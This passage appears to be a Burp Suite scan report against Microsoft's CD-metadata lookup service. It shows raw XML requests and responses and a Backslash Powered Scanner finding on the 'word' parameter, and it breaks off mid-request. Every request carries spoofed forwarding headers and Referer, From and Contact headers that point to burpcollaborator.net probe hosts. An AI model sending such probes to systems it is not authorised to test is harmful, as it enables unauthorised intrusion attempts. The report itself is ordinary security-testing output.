<METADATA><mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID><WMCollectionID>55e617c0-2f87-4138-95e0-4ff2c14db22d</WMCollectionID><WMCollectionGroupID>55e617c0-2f87-4138-95e0-4ff2c14db22d</WMCollectionGroupID><uniqueFileID>AMGa_id=R 651320</uniqueFileID><albumTitle>Metamorphosis</albumTitle><albumArtist>Hilary Duff</albumArtist><releaseDate>2003-08-26</releaseDate><label>Hollywood</label><genre>Dance</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>7</publisherRating><buyParams>providerName=AMG&albumID=55E617C0-2F87-4138-95E0-4FF2C14DB22D&a_id=R%20%20%20651320&album=Metamorphosis&artistID=A6147DEC-66F7-4FFA-9509-55CEAE98F241&p_id=P%20%20%20543502&artist=Hilary%20Duff</buyParams><largeCoverParams>200/drN600/N680/N68030XQ0ZA.jpg</largeCoverParams><smallCoverParams>075/drN600/N680/N68030XQ0ZA.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20651320</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>95aca773-c75c-458b-9c45-57ef730e169a</WMContentID><trackRequestID>0</trackRequestID><trackTitle>So Yesterday</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486174</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Charlie Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>d216c636-a69e-4302-ba7b-4cf4be5cb7c7</WMContentID><trackRequestID></trackRequestID><trackTitle>Come Clean</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486175</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>J. Shanks; K. DioGuardi</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>5b493231-1a48-486b-a67d-36e81cf8e120</WMContentID><trackRequestID></trackRequestID><trackTitle>Workin' It Out</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486176</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Charlie Midnight; Charlton Pettus; Marc Swersky</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>1fb70fb2-0704-46ea-b976-9d170736711c</WMContentID><trackRequestID></trackRequestID><trackTitle>Little Voice</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486177</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>K. DioGuardi; P. Berger</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>b09c2af7-ab84-4861-a0d9-2aa318165eb6</WMContentID><trackRequestID></trackRequestID><trackTitle>Where Did I Go Right?</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486178</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>daea42ac-8dd2-403c-8e8d-f5ab9244cf8a</WMContentID><trackRequestID></trackRequestID><trackTitle>Anywhere But Here</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486179</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Chico Bennett; J. Marr; Wendy Page</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>878bfbb8-2a48-43b6-ad38-bb30236f1dce</WMContentID><trackRequestID></trackRequestID><trackTitle>The Math</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486180</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>de4ef328-d85b-446b-b2c1-93a94e8e92e2</WMContentID><trackRequestID></trackRequestID><trackTitle>Love Just Is</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486181</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; J. Marr; Wendy Page</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>01f78d07-5188-4410-86b1-c68d9c7194f0</WMContentID><trackRequestID></trackRequestID><trackTitle>Sweet Sixteen</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486182</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Hilary Duff; T. Caudell</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>87aec855-6cca-44f8-bffa-78a7dbad478e</WMContentID><trackRequestID></trackRequestID><trackTitle>Party Up</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486183</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>A. George; M. Brooks; T. Rhodes</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>92ed3bf2-7b2e-489f-88e9-aa3010727b3c</WMContentID><trackRequestID></trackRequestID><trackTitle>Metamorphosis</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486184</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>A. Recke; C. Midnight; Chico Bennett; Hilary Duff</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bb36885c-a915-471b-b0f3-e342226f9dd5</WMContentID><trackRequestID></trackRequestID><trackTitle>Inner Strength</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486185</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Hilary Duff</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c4b77b38-6f45-4b53-89c3-dd72ea9c9cb8</WMContentID><trackRequestID></trackRequestID><trackTitle>Why Not [*]</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486186</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Matthew Gerrard</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=5FF01FB3-DC52-43A7-B976-24D8046AA42D&mp5n4=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@a0bjqj57njhcps6c522osgbznqthndk19.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1085
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://sxt1n12pk1euma3u2kz6py8hk8qzkupie.burpcollaborator.net/ref
X-Real-IP: spoofed.e3intn8bqnkgsw9g865svke3quwlqhg55.burpcollaborator.net
Forwarded: for=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;by=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;host=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net
X-Forwarded-For: spoofed.dubmkmzahmbfjv0fz5wrmj52htnkhg94y.burpcollaborator.net
Contact: root@aesj4jj71jvc3skcj2go6gpz1q7h1du1j.burpcollaborator.net
From: root@k2ntst7hptjmr28m7c4yuqd9p0vrpnjb8.burpcollaborator.net
True-Client-IP: spoofed.u1w3r36ro3iwqc7w6m38t0cjoau1oxjl8.burpcollaborator.net
X-Wap-Profile: http://ewenmn1bjndglw2g16ysok73jupljhf54.burpcollaborator.net/wap.xml
Client-ip: spoofed.c2flsl79pljeru8e744quid1psvjpfn3c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID>
<album>
<title>
<text>Metamorphosis</text>
<word>Metamorphosis</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
</album>
<track>
<title>
<text>So Yesterday</text>
<word>So</word>
<word>zndefined</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 So Yesterday.m4a</filename>
<trackDuration>215341</trackDuration>
<bitrate>262264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=5FF01FB3-DC52-43A7-B976-24D8046AA42D&zu9yyrwfa05=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@a0bjqj57njhcps6c522osgbznqthndk19.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1081
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://sxt1n12pk1euma3u2kz6py8hk8qzkupie.burpcollaborator.net/ref
X-Real-IP: spoofed.e3intn8bqnkgsw9g865svke3quwlqhg55.burpcollaborator.net
Forwarded: for=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;by=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;host=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net
X-Forwarded-For: spoofed.dubmkmzahmbfjv0fz5wrmj52htnkhg94y.burpcollaborator.net
Contact: root@aesj4jj71jvc3skcj2go6gpz1q7h1du1j.burpcollaborator.net
From: root@k2ntst7hptjmr28m7c4yuqd9p0vrpnjb8.burpcollaborator.net
True-Client-IP: spoofed.u1w3r36ro3iwqc7w6m38t0cjoau1oxjl8.burpcollaborator.net
X-Wap-Profile: http://ewenmn1bjndglw2g16ysok73jupljhf54.burpcollaborator.net/wap.xml
Client-ip: spoofed.c2flsl79pljeru8e744quid1psvjpfn3c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID>
<album>
<title>
<text>Metamorphosis</text>
<word>Metamorphosis</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
</album>
<track>
<title>
<text>So Yesterday</text>
<word>So</word>
<word>empty</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 So Yesterday.m4a</filename>
<trackDuration>215341</trackDuration>
<bitrate>262264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:09 GMT
Connection: close

<METADATA><mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID><WMCollectionID>55e617c0-2f87-4138-95e0-4ff2c14db22d</WMCollectionID><WMCollectionGroupID>55e617c0-2f87-4138-95e0-4ff2c14db22d</WMCollectionGroupID><uniqueFileID>AMGa_id=R 651320</uniqueFileID><albumTitle>Metamorphosis</albumTitle><albumArtist>Hilary Duff</albumArtist><releaseDate>2003-08-26</releaseDate><label>Hollywood</label><genre>Dance</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>7</publisherRating><buyParams>providerName=AMG&albumID=55E617C0-2F87-4138-95E0-4FF2C14DB22D&a_id=R%20%20%20651320&album=Metamorphosis&artistID=A6147DEC-66F7-4FFA-9509-55CEAE98F241&p_id=P%20%20%20543502&artist=Hilary%20Duff</buyParams><largeCoverParams>200/drN600/N680/N68030XQ0ZA.jpg</largeCoverParams><smallCoverParams>075/drN600/N680/N68030XQ0ZA.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20651320</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>95aca773-c75c-458b-9c45-57ef730e169a</WMContentID><trackRequestID>0</trackRequestID><trackTitle>So Yesterday</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486174</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Charlie Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>d216c636-a69e-4302-ba7b-4cf4be5cb7c7</WMContentID><trackRequestID></trackRequestID><trackTitle>Come Clean</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486175</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>J. Shanks; K. DioGuardi</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>5b493231-1a48-486b-a67d-36e81cf8e120</WMContentID><trackRequestID></trackRequestID><trackTitle>Workin' It Out</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486176</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Charlie Midnight; Charlton Pettus; Marc Swersky</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>1fb70fb2-0704-46ea-b976-9d170736711c</WMContentID><trackRequestID></trackRequestID><trackTitle>Little Voice</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486177</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>K. DioGuardi; P. Berger</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>b09c2af7-ab84-4861-a0d9-2aa318165eb6</WMContentID><trackRequestID></trackRequestID><trackTitle>Where Did I Go Right?</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486178</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>daea42ac-8dd2-403c-8e8d-f5ab9244cf8a</WMContentID><trackRequestID></trackRequestID><trackTitle>Anywhere But Here</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486179</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Chico Bennett; J. Marr; Wendy Page</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>878bfbb8-2a48-43b6-ad38-bb30236f1dce</WMContentID><trackRequestID></trackRequestID><trackTitle>The Math</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486180</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Graham Edwards; Lauren Christy; Scott Spock</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>de4ef328-d85b-446b-b2c1-93a94e8e92e2</WMContentID><trackRequestID></trackRequestID><trackTitle>Love Just Is</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486181</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; J. Marr; Wendy Page</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>01f78d07-5188-4410-86b1-c68d9c7194f0</WMContentID><trackRequestID></trackRequestID><trackTitle>Sweet Sixteen</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486182</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Hilary Duff; T. Caudell</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>87aec855-6cca-44f8-bffa-78a7dbad478e</WMContentID><trackRequestID></trackRequestID><trackTitle>Party Up</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486183</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>A. George; M. Brooks; T. Rhodes</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>92ed3bf2-7b2e-489f-88e9-aa3010727b3c</WMContentID><trackRequestID></trackRequestID><trackTitle>Metamorphosis</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486184</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>A. Recke; C. Midnight; Chico Bennett; Hilary Duff</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>bb36885c-a915-471b-b0f3-e342226f9dd5</WMContentID><trackRequestID></trackRequestID><trackTitle>Inner Strength</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486185</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>Hilary Duff</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track><track><WMContentID>c4b77b38-6f45-4b53-89c3-dd72ea9c9cb8</WMContentID><trackRequestID></trackRequestID><trackTitle>Why Not [*]</trackTitle><uniqueFileID>AMGp_id=P 543502;AMGt_id=T 6486186</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Hilary Duff</trackPerformer><trackComposer>C. Midnight; Matthew Gerrard</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>0</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=5FF01FB3-DC52-43A7-B976-24D8046AA42D&gdd3suz20=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@a0bjqj57njhcps6c522osgbznqthndk19.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1081
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://sxt1n12pk1euma3u2kz6py8hk8qzkupie.burpcollaborator.net/ref
X-Real-IP: spoofed.e3intn8bqnkgsw9g865svke3quwlqhg55.burpcollaborator.net
Forwarded: for=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;by=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;host=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net
X-Forwarded-For: spoofed.dubmkmzahmbfjv0fz5wrmj52htnkhg94y.burpcollaborator.net
Contact: root@aesj4jj71jvc3skcj2go6gpz1q7h1du1j.burpcollaborator.net
From: root@k2ntst7hptjmr28m7c4yuqd9p0vrpnjb8.burpcollaborator.net
True-Client-IP: spoofed.u1w3r36ro3iwqc7w6m38t0cjoau1oxjl8.burpcollaborator.net
X-Wap-Profile: http://ewenmn1bjndglw2g16ysok73jupljhf54.burpcollaborator.net/wap.xml
Client-ip: spoofed.c2flsl79pljeru8e744quid1psvjpfn3c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID>
<album>
<title>
<text>Metamorphosis</text>
<word>Metamorphosis</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
</album>
<track>
<title>
<text>So Yesterday</text>
<word>So</word>
<word>zmpty</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 So Yesterday.m4a</filename>
<trackDuration>215341</trackDuration>
<bitrate>262264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.4. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	53	3
whole_body_content	X	Y
content_length	5885	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	53	3
whole_body_content	X	Y
content_length	5885	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F&xu1qmy0=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@r3v0t08oq0kts99t8j55vxegq7wcrff4.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1078
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://7s0gigx4fg99hpy9xzulkd3wfnlsgn4c.burpcollaborator.net/ref
X-Real-IP: spoofed.3kocacp07c159lq5pvmhc9vs7jdo8kw9.burpcollaborator.net
Forwarded: for=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;by=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;host=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net
X-Forwarded-For: spoofed.6krfafp37f189oq8pymkccvv7mdr8pwe.burpcollaborator.net
Contact: root@7z7gpg44mgg9op594z1lrdawmnssnrbg.burpcollaborator.net
From: root@xjk696ou660z8fpzoplbb3um6dci7iv7.burpcollaborator.net
True-Client-IP: spoofed.y327t78vq7k0sg908q5cv4enqewjrkf9.burpcollaborator.net
X-Wap-Profile: http://h0iqqq5enqhjpz6j592vsnb6nxt2o4ct.burpcollaborator.net/wap.xml
Client-ip: spoofed.yxz7n72vk7e0mg302qzcp48nkeqjln9c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F</mdqRequestID>
<album>
<title>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
</album>
<track>
<title>
<text>Guilty</text>
<word>undefined</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 Guilty.m4a</filename>
<trackDuration>242091</trackDuration>
<bitrate>283248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F&rdcq245=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@r3v0t08oq0kts99t8j55vxegq7wcrff4.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1078
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://7s0gigx4fg99hpy9xzulkd3wfnlsgn4c.burpcollaborator.net/ref
X-Real-IP: spoofed.3kocacp07c159lq5pvmhc9vs7jdo8kw9.burpcollaborator.net
Forwarded: for=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;by=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net;host=spoofed.d8mmymdavmpfxvefd5ar0jj2vt1ywvkk.burpcollaborator.net
X-Forwarded-For: spoofed.6krfafp37f189oq8pymkccvv7mdr8pwe.burpcollaborator.net
Contact: root@7z7gpg44mgg9op594z1lrdawmnssnrbg.burpcollaborator.net
From: root@xjk696ou660z8fpzoplbb3um6dci7iv7.burpcollaborator.net
True-Client-IP: spoofed.y327t78vq7k0sg908q5cv4enqewjrkf9.burpcollaborator.net
X-Wap-Profile: http://h0iqqq5enqhjpz6j592vsnb6nxt2o4ct.burpcollaborator.net/wap.xml
Client-ip: spoofed.yxz7n72vk7e0mg302qzcp48nkeqjln9c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F</mdqRequestID>
<album>
<title>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
</album>
<track>
<title>
<text>Guilty</text>
<word>zndefined</word>
</title>
<artist>
<text>Gravity Kills</text>
<word>Gravity</word>
<word>Kills</word>
</artist>
<trackNumber>2</trackNumber>
<filename>02 Guilty.m4a</filename>
<trackDuration>242091</trackDuration>
<bitrate>283248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=A4A0B91B-E672-45EA-BE7F-8A1A75EFF43F&y4eagum1=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@r3v0t08oq0kts99t8j55vxegq7wcrff4.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1074
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://7s0gigx4fg99hpy9xzulkd3wfnlsgn4c.burpcollaborator.net/ref
